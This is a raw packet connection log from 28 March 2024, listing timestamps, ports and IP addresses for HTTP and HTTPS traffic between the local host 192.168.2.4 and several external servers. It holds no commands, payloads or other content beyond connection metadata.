Mar 28, 2024 09:14:59.957693100 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.957742929 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.958194017 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.958221912 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.958262920 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.959884882 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.959894896 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.959945917 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.960129976 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.960166931 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.960206032 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.960232973 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.962061882 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.962069988 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.962085009 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.962125063 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.962129116 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.962135077 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.962183952 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.963074923 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:14:59.963141918 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:14:59.963160038 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:14:59.963167906 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:14:59.963181019 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:14:59.963227034 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:14:59.963227034 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:14:59.963229895 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:14:59.963238001 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:14:59.963253021 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:14:59.963268995 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:14:59.963289976 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:14:59.963304996 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:14:59.963314056 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:14:59.963339090 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:14:59.963368893 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:14:59.963412046 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:14:59.963934898 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.963942051 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.963983059 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.964273930 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.964291096 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.964330912 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.965759993 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.965790987 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.965797901 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.965847969 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.966492891 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.966500998 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.966543913 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.967660904 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.967713118 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.967724085 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.967751026 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.968616009 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.968667984 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.968720913 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.969506025 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.969513893 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.969558001 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.970782042 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.970797062 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.970845938 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.971313000 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.971360922 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.971362114 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.971404076 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.972883940 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.972891092 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.972933054 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.973170996 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.973202944 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.973231077 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.973249912 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.974941969 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.975017071 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.975023031 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.975023985 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.975070953 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.975959063 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.975986958 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.976037025 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.977060080 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.977096081 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.977130890 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.977153063 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.977720022 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.977741957 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.977757931 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.977782011 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.979152918 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.979161978 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.979213953 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.979454994 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.979461908 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.979511976 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.981224060 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.981230974 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.981285095 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.981288910 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.981292963 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.981336117 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.983042955 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.983071089 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.983099937 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.983258009 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.983340025 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.983366966 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.983386993 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.984808922 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.984817982 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.984864950 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.985306025 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.985337019 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.985383987 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.986525059 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.986577034 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.986578941 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.986649036 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.987386942 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.987406015 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.987451077 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.988262892 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.988270998 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.988322020 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.989413023 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.989424944 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.989466906 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.990014076 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.990061998 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.990108013 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.991321087 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.991367102 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.991374016 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.991414070 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.991667032 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.991676092 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.991724968 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.993360996 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.993377924 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.993411064 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.993424892 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.993434906 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.993438005 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.993479013 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.993479967 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.995176077 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.995184898 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.995233059 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.995340109 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.995356083 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.995397091 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.996802092 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.996810913 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.996859074 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.997340918 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.997359037 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.997401953 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.998372078 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.998405933 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.998424053 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.998466969 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.999296904 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.999311924 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.999361038 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.000073910 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.000082016 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.000119925 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.001333952 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.001368999 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.001405001 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.001774073 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.001781940 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.001822948 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.003261089 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.003271103 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.003312111 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.003371954 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.003443956 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.003463984 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.003494978 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.004949093 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.004957914 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.004995108 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.005132914 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.005141973 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.005163908 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.005187988 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.006582975 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.006591082 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.006623983 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.007023096 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.007036924 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.007071972 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.007098913 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.008347034 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.008362055 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.008389950 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.008414984 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.008905888 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.008924961 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.008968115 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.009774923 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.009825945 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.009845972 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.009880066 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.010821104 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.010847092 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.010874987 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.010890961 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.011384964 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.011459112 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.011468887 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.011502981 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.012717962 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.012739897 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.012768030 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.012928009 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.012969017 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.012981892 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.013014078 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.014518023 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.014553070 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.014586926 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.014602900 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.014624119 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.014673948 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.015564919 CET	80	49770	93.186.225.194	192.168.2.4
Mar 28, 2024 09:15:00.015571117 CET	80	49770	93.186.225.194	192.168.2.4
Mar 28, 2024 09:15:00.015578032 CET	80	49770	93.186.225.194	192.168.2.4
Mar 28, 2024 09:15:00.015616894 CET	49770	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:15:00.016103983 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.016139984 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.016172886 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.016467094 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.016505957 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.016546011 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.017674923 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.017699957 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.017744064 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.018301964 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.018349886 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.018392086 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.019220114 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.019233942 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.019269943 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.020132065 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.020139933 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.020194054 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.020631075 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.020658016 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.020699024 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.021986008 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.022012949 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.022063971 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.022281885 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.022303104 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.022341013 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.022361040 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.022424936 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.022453070 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.022469997 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.022504091 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.022531033 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.022532940 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.022577047 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.022591114 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.022598028 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.022622108 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.022633076 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.022672892 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.022672892 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.022680044 CET	443	49772	104.21.42.248	192.168.2.4
Mar 28, 2024 09:15:00.022701025 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.022718906 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.022753954 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.022757053 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.022759914 CET	49772	443	192.168.2.4	104.21.42.248
Mar 28, 2024 09:15:00.022783995 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.022794962 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.022804022 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.022826910 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.022830963 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.022881985 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.022886038 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.022888899 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.022903919 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.022922993 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.022932053 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.022957087 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.023502111 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.023541927 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.023549080 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.023564100 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.023571014 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.023572922 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.023595095 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.023631096 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.023658037 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.023694992 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.023720980 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.023761034 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.023778915 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.023808002 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.023816109 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.023843050 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.023874998 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.023884058 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.023911953 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.023924112 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.023968935 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.023974895 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.023999929 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.024019003 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.024039030 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.024053097 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.024070024 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.024101019 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.024151087 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.024204969 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.024245024 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.024249077 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.024265051 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.024290085 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.024297953 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.024311066 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.024326086 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.024346113 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.024365902 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.024398088 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.024434090 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.024442911 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.024445057 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.024475098 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.024477005 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.024516106 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.024549961 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.024569988 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.024586916 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.024616957 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.024626017 CET	80	49734	195.20.16.46	192.168.2.4
